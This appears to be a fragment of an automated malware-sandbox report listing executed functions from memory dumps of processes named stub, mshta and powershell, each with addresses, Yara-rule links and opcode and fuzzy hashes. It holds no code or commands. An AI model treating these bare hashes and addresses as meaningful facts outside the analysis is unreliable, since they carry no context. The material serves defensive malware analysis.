                                                                                                                                                                                                                                    • Opcode ID: 9d01d9c6a468e975fbb5e1542fedb4de887afaa88ef3e9b2b7a58de9fc82d48c
                                                                                                                                                                                                                                    • Instruction ID: 9bd953012dc6dbe0c218d7f681d18d94a9ac54fc86a004ec30f567c095fcdc8b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d01d9c6a468e975fbb5e1542fedb4de887afaa88ef3e9b2b7a58de9fc82d48c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F036F5A07A42C1DA4EEF35D85017423A4EF44B96F544571CE2D86250CE2ED49A8320
                                                                                                                                                                                                                                    Function 00007FFBAAF2B840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeallocErr_String
                                                                                                                                                                                                                                    • String ID: __qualname__ must be set to a string object
                                                                                                                                                                                                                                    • API String ID: 1259552197-2284195966
                                                                                                                                                                                                                                    • Opcode ID: 9329c64500ab0b39ddaa233be4cff1995aae19876241e79bceb2742aa797885e
                                                                                                                                                                                                                                    • Instruction ID: 792d0d914d578497b6eb2266a5762c5faf630150ef29098290b70d2d4f456a1b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9329c64500ab0b39ddaa233be4cff1995aae19876241e79bceb2742aa797885e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F096F9A06A02C1DA0EAB35D8501B423A4FF54B99F544271CD2D82260CF2ED05B8321

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 0000025C41CC0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000003.1664733778.0000025C41CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C41CC0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_3_25c41cc0000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                    • Instruction ID: 42f6405eb7c50f96d842e790e2d3132bfe546bcb42af2963d39aabe43a523067
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD900208495A0759D41415950C5965C50406388151FE444C04456A0244F45D06E65156

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FFB49712CA9 Relevance: 1.1, Instructions: 1090COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f3750f62cfbc664f03a496f9bb06090b02803ce91c25948379c15f9e82e7c00e
                                                                                                                                                                                                                                    • Instruction ID: 34d579d208efc5bc16c0312eca62031204b6ebeaabe84969eec901be8e3e3916
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3750f62cfbc664f03a496f9bb06090b02803ce91c25948379c15f9e82e7c00e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64622AA2A0DB870FE75AAF38D8561B57BE1EF46250B0801FBD48DC7293DE199C05C396
                                                                                                                                                                                                                                    Function 00007FFB497135BA Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e4c3bd0d908d34e15e1a52b36bf76236446b7cf18717898dcbb7b8a9dbbece24
                                                                                                                                                                                                                                    • Instruction ID: 5e6c7c8de4d608f176069f5e57fd1f65554a26d46ac1680cd221edbdf95492fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4c3bd0d908d34e15e1a52b36bf76236446b7cf18717898dcbb7b8a9dbbece24
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05612AB2E1EA8B4FE7A9AE3C985657577D0EF95390B0801BAD48DC32D2DE19DC048345
                                                                                                                                                                                                                                    Function 00007FFB4971308F Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 29265085f1fda7df59c4b5d1760d724e433ebe53974b271fa66c8813aca79132
                                                                                                                                                                                                                                    • Instruction ID: 8341dc8fad5a2ef0ef020b6cecf4c197be6b05d4ad61d18a0b9b4aefd1f3a136
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29265085f1fda7df59c4b5d1760d724e433ebe53974b271fa66c8813aca79132
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664127E2E1EE470BF39DAE38865717866D2EF453A0B4801B9D4CDC32E6DF199C059349
                                                                                                                                                                                                                                    Function 00007FFB4971364A Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c988a44e9495d3b38950a3434e0fc97ae0961602e1ded6cde6318fc410cb03c6
                                                                                                                                                                                                                                    • Instruction ID: 3fbe24cef4adf3496d82a8615982b8f4067375f99d54638f875195ddd44d45c6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c988a44e9495d3b38950a3434e0fc97ae0961602e1ded6cde6318fc410cb03c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF31E2E2E1EA838FF79DAF78899717866D0EF4529074801BAE4CDC32D2EE1D9C048345
                                                                                                                                                                                                                                    Function 00007FFB49712D7F Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f897ae35106259eb10fe843f16da3eece5370ab8139f305b5737ee7323dc2ac2
                                                                                                                                                                                                                                    • Instruction ID: 0c55c87171f52913c3ad46b7a3bcf45d6370d26538427c0cc92aaa9c90e2ca38
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f897ae35106259eb10fe843f16da3eece5370ab8139f305b5737ee7323dc2ac2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B21D8B6A1CA470FE798EE28E9825B477D1FF88750B444275D14DC3386CE24AC4643C9
                                                                                                                                                                                                                                    Function 00007FFB49644795 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1901190571.00007FFB49640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49640000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49640000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6ef34e9812a99c34b771e7d9ff2f8b08d45973efefe44c61f27bbc15d5f97d4e
                                                                                                                                                                                                                                    • Instruction ID: 204f3fc9c871dbd3e14311b44d8454619dd6a022d0ef9b0a2d61f5a4a98f18da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef34e9812a99c34b771e7d9ff2f8b08d45973efefe44c61f27bbc15d5f97d4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A01A77010CB0C4FD748EF0CE451AA6B7E0FB85324F10056DE58AC3661D632E882CB45
                                                                                                                                                                                                                                    Function 00007FFB49710296 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000038.00000002.1902822187.00007FFB49710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49710000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_7ffb49710000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: eb370e69879ef1b0368aab4a65e577fb668231c054e0d2786547765a8fcc8676
                                                                                                                                                                                                                                    • Instruction ID: f3853e276cbe895be2102f68fb25c6c844f59e5d0c29d30211ab23b49b205295
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb370e69879ef1b0368aab4a65e577fb668231c054e0d2786547765a8fcc8676
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE026A3F1E93E0BB3A2BD6C64072F4A2C0DF5867074801B3D84CC3692EE059C1003C6